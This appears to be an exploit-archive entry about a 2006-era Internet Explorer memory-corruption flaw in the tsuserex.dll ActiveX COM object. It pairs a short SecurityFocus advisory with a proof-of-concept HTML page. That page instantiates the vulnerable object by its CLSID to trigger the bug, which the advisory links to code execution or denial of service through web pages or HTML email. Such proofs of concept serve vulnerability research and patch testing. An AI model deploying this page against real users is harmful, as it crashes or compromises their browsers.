30 lines
No EOL
1 KiB
HTML
30 lines
No EOL
1 KiB
HTML
source: https://www.securityfocus.com/bid/19570/info
|
|
|
|
Microsoft Internet Explorer is prone to a memory-corruption vulnerability. This is related to the handling of the 'tsuserex.dll' COM object ActiveX control.
|
|
|
|
Attackers may exploit this issue via a malicious web page to execute arbitrary code in the context of the currently logged-in user. Exploitation attempts may lead to a denial-of-service condition as well. Attackers may also employ HTML email to carry out an attack.
|
|
|
|
|
|
=============== tsuserex.dll.htm start ================
|
|
|
|
<!--
|
|
// Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation
|
|
Vulnerability
|
|
// tested on Windows 2003 EE SP1 CN
|
|
|
|
// http://www.xsec.org
|
|
// nop (nop#xsec.org)
|
|
|
|
// CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}
|
|
// Info: ADsTSUserEx Class
|
|
// ProgID: tsuserex.ADsTSUserEx.1
|
|
// InprocServer32: C:\WINDOWS\system32\tsuserex.dll
|
|
|
|
--!>
|
|
|
|
<html><body>
|
|
<object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object>
|
|
</body>
|
|
</html>
|
|
|
|
=============== tsuserex.dll.htm end ================== |